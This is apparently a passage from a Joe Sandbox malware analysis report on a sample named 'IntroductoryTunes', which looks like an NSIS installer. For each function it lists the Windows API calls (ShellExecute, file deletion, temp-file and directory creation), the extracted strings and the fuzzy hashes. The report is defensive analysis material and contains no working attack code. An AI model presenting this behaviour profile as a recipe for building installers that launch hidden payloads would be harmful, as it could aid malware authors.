Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$FinePregnancyPossiblySleepingSurgeryMerger$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-3276817075
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424976,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424976,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424976,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

N, xrefs: 00404C32
M, xrefs: 00404B6F
@, xrefs: 00404BBC
, xrefs: 00404F65

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
